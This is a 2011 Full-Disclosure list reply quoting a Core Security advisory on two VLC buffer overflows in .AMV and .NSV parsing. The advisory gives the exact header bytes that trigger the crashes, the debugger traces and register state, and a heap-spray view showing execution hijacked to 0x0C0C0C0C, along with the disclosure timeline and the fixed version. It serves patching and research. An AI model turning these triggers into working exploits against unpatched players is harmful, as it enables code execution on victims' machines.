Hmm...well, this is one vulnerability, not two, and it was fixed in VLC's tree on February 12. Still a nice find.
-Dan On Wed, Mar 23, 2011 at 4:34 PM, CORE Security Technologies Advisories <[email protected]> wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Core Security Technologies - Corelabs Advisory > http://corelabs.coresecurity.com/ > > VLC Vulnerabilities handling .AMV and .NSV files > > > 1. *Advisory Information* > > Title: VLC Vulnerabilities handling .AMV and .NSV files > Advisory ID: CORE-2011-0208 > Advisory URL: > http://www.coresecurity.com/content/vlc-vulnerabilities-amv-nsv-files > Date published: 2011-03-23 > Date of last update: 2011-03-23 > Vendors contacted: VLC team > Release mode: Coordinated release > > > 2. *Vulnerability Information* > > Class: Buffer overflow [CWE-119], Buffer overflow [CWE-119] > Impact: Code execution > Remotely Exploitable: Yes (client-side) > Locally Exploitable: No > CVE Name: CVE-2010-3275, CVE-2010-3276 > > > 3. *Vulnerability Description* > > Two vulnerabilities have been found in VLC media player [1], when > handling .AMV and .NSV file formats. These vulnerabilities can be > exploited by a remote attacker to obtain arbitrary code execution with > the privileges of the user running VLC. > > > 4. *Vulnerable packages* > > . VLC 1.1.4 > . VLC 1.1.5 > . VLC 1.1.6 > . VLC 1.1.7 > . Older versions may be affected, but were not checked. > > > 5. *Non-vulnerable packages* > > . VLC 1.1.8 > > > 6. *Vendor Information, Solutions and Workarounds* > > These vulnerabilities are fixed in VLC version 1.1.8, which can be > downloaded from http://www.videolan.org/ > > > 7. *Credits* > > These vulnerabilities were discovered and researched by Ricardo Narvaja > from Core Security Technologies. Publication was coordinated by Carlos > Sarraute. > > > 8. *Technical Description / Proof of Concept Code* > > > 8.1. *Vulnerability in VLC 1.1.4 to 1.1.7 when handling AMV files > [CVE-2010-3275]* > > This vulnerability was found by fuzzing different formats. In AMV files > if the offset 0x41 is changed to a value greater than 90 as shown below: > > /----- > Offset(h) > > 00000000 52 49 46 46 00 00 00 00 41 4D 56 20 4C 49 53 54 RIFF....AMV LIST > 00000010 00 00 00 00 68 64 72 6C 61 6D 76 68 38 00 00 00 ....hdrlamvh8... > 00000020 24 F4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 $ô.............. > 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ > 00000040 A0 A0 > > - -----/ > > > Then the program will crash in the following plugin: > > /----- > Executable modules, item 248 > Base=6D680000 > Size=00017000 (94208.) > Entry=6D6810C0 libdir_1.<ModuleEntryPoint> > Name=libdir_1 > Path=C:\Program Files\VideoLAN\VLC\plugins\libdirectx_plugin.dll > > - -----/ > > > More precisely in this location: > > /----- > 6D6812A1 8B10 MOV EDX,DWORD PTR DS:[EAX] > 6D6812A3 894C24 04 MOV DWORD PTR SS:[ESP+4],ECX > 6D6812A7 890424 MOV DWORD PTR SS:[ESP],EAX > 6D6812AA FF92 80000000 CALL DWORD PTR DS:[EDX+80] > > offset > > 000006A1 8B10 MOV EDX,DWORD PTR DS:[EAX] > 000006A3 894C24 04 MOV DWORD PTR SS:[ESP+4],ECX > 000006A7 890424 MOV DWORD PTR SS:[ESP],EAX > 000006AA FF92 80000000 CALL DWORD PTR DS:[EDX+80] > > registers > > EAX 3DD1255C > ECX 00000000 > EDX 3032344A > EBX 3DDF9410 > ESP 3F82FC04 > EBP 3DD1229C > ESI 3DD1255C > EDI 3DDF90BC > EIP 6D6812AA libdir_1.6D6812AA > > - -----/ > > > When executing an appropriate heap spray in Internet explorer: > > /----- > 303234CA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................ > 303234DA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................ > 303234EA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................ > 303234FA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................ > 3032350A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................ > 3032351A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................ > 3032352A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................ > > - -----/ > > > We manage to take control of the execution flow and execute our code: > > /----- > 0C0C0C0C 0C 0C OR AL,0C > 0C0C0C0E 0C 0C OR AL,0C > 0C0C0C10 0C 0C OR AL,0C > 0C0C0C12 0C 0C OR AL,0C > 0C0C0C14 0C 0C OR AL,0C > 0C0C0C16 0C 0C OR AL,0C > 0C0C0C18 0C 0C OR AL,0C > 0C0C0C1A 0C 0C OR AL,0C > 0C0C0C1C 0C 0C OR AL,0C > 0C0C0C1E 0C 0C OR AL,0C > 0C0C0C20 0C 0C OR AL,0C > 0C0C0C22 0C 0C OR AL,0C > 0C0C0C24 0C 0C OR AL,0C > 0C0C0C26 0C 0C OR AL,0C > > - -----/ > > > > 8.2. *Vulnerability in VLC 1.1.4 to 1.1.7 when handling NSV files > [CVE-2010-3276]* > > In NSV files when changing the offsets 0x0b to 0x0e as shown below: > > /----- > Offset(h) > > 00000000 4E 53 56 73 56 50 33 31 4D 50 33 98 00 99 01 01 NSVsVP31MP3_._.. > > - -----/ > > > We can make the program crash in the following plugin: > > /----- > Executable modules, item 248 > Base=6D680000 > Size=00017000 (94208.) > Entry=6D6810C0 libdir_1.<ModuleEntryPoint> > Name=libdir_1 > Path=C:\Program Files\VideoLAN\VLC\plugins\libdirectx_plugin.dll > > - -----/ > > > More precisely in this location: > > /----- > 6D6812A1 8B10 MOV EDX,DWORD PTR DS:[EAX] > 6D6812A3 894C24 04 MOV DWORD PTR SS:[ESP+4],ECX > 6D6812A7 890424 MOV DWORD PTR SS:[ESP],EAX > 6D6812AA FF92 80000000 CALL DWORD PTR DS:[EDX+80] > > offset > > 000006A1 8B10 MOV EDX,DWORD PTR DS:[EAX] > 000006A3 894C24 04 MOV DWORD PTR SS:[ESP+4],ECX > 000006A7 890424 MOV DWORD PTR SS:[ESP],EAX > 000006AA FF92 80000000 CALL DWORD PTR DS:[EDX+80] > > registers > > EAX 37CE12FC ASCII "I420" > ECX 00000000 > EDX 30323449 > EBX 37D8F268 > ESP 3865FC04 > EBP 37CE103C > ESI 37CE12FC ASCII "I420" > EDI 37D8E314 > EIP 6D6812AA libdirec.6D6812AA > > - -----/ > > > When executing an appropriate heap spray in Internet explorer: > > /----- > 303234CA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................ > 303234DA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................ > 303234EA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................ > 303234FA 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................ > 3032350A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................ > 3032351A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................ > 3032352A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ................ > > - -----/ > > > We make the execution continue in our code: > > /----- > 0C0C0C0C 0C 0C OR AL,0C > 0C0C0C0E 0C 0C OR AL,0C > 0C0C0C10 0C 0C OR AL,0C > 0C0C0C12 0C 0C OR AL,0C > 0C0C0C14 0C 0C OR AL,0C > 0C0C0C16 0C 0C OR AL,0C > 0C0C0C18 0C 0C OR AL,0C > 0C0C0C1A 0C 0C OR AL,0C > 0C0C0C1C 0C 0C OR AL,0C > 0C0C0C1E 0C 0C OR AL,0C > 0C0C0C20 0C 0C OR AL,0C > 0C0C0C22 0C 0C OR AL,0C > 0C0C0C24 0C 0C OR AL,0C > 0C0C0C26 0C 0C OR AL,0C > > - -----/ > > > > 9. *Report Timeline* > > . 2011-02-08: > Core Security Technologies notifies the VLC team of the vulnerabilities. > Publication date is temporarily set to February 28, 2011. > > . 2011-02-08: > VLC team acknowledges notification and provides PGP keys. > > . 2011-02-09: > Core sends a technical description and PoC files that trigger the > vulnerabilities. > > . 2011-02-18: > Core asks the VLC team whether they could reproduce the vulnerabilities. > > . 2011-02-23: > VLC team replies that fixes will be included in VLC 1.1.8, and that they > believe the issue is not exploitable. > > . 2011-02-25: > Core replies that the issues have been confirmed to be exploitable, and > that the researcher has developed fully working exploits. Core offers to > reschedule the publication of its advisory to coordinate it with the > release of fixes. > > . 2011-03-10: > Core requests an update on this issue, since no reply was received. Core > notes that the PoC files and exploits were tested on Windows only, and > reschedules publication to March 16, stating that the advisory will be > published as "user release" if no reply is received. > > . 2011-03-10: > VLC team requests two additional weeks for the release of fixes, and > asks whether the vulnerabilities are exploitable with ASLR. > > . 2011-03-14: > Core agrees to postpone publication, confirms that the bugs are > exploitable with ASLR, and requests a concrete date for the release. > > . 2011-03-16: > VLC team states that they would like to release on March 23rd. > > . 2011-03-18: > Core agrees with the release date. > > . 2011-03-23: > Advisory CORE-2011-0208 is published. > > > > 10. *References* > > [1] VLC media player http://www.videolan.org/ > > > 11. *About CoreLabs* > > CoreLabs, the research center of Core Security Technologies, is charged > with anticipating the future needs and requirements for information > security technologies. We conduct our research in several important > areas of computer security including system vulnerabilities, cyber > attack planning and simulation, source code auditing, and cryptography. > Our results include problem formalization, identification of > vulnerabilities, novel solutions and prototypes for new technologies. > CoreLabs regularly publishes security advisories, technical papers, > project information and shared software tools for public use at: > http://corelabs.coresecurity.com. > > > 12. *About Core Security Technologies* > > Core Security Technologies enables organizations to get ahead of threats > with security test and measurement solutions that continuously identify > and prove real-world exposures to their most critical assets. Our > customers can gain real visibility into their security standing, real > validation of their security controls, and real metrics to more > effectively secure their organizations. > > Core Security's software solutions build on over a decade of trusted > research and leading-edge threat expertise from the company's Security > Consulting Services, CoreLabs and Engineering groups. Core Security > Technologies can be reached at +1 (617) 399-6980 or on the Web at: > http://www.coresecurity.com. > > > 13. *Disclaimer* > > The contents of this advisory are copyright (c) 2011 Core Security > Technologies and (c) 2011 CoreLabs, and are licensed under a Creative > Commons Attribution Non-Commercial Share-Alike 3.0 (United States) > License: http://creativecommons.org/licenses/by-nc-sa/3.0/us > > > 14. *PGP/GPG Keys* > > This advisory has been signed with the GPG key of Core Security > Technologies advisories team, which is available for download at > http://www.coresecurity.com/files/attachments/core_security_advisories.asc. > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.9 (MingW32) > > iEYEARECAAYFAk2KWWUACgkQyNibggitWa1ilwCgmcHE6sjoDBlD6iaSlYBAJiXA > wnEAnjC85SPOZ1+ugKtVCGl7bxswqek9 > =oV7u > -----END PGP SIGNATURE----- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
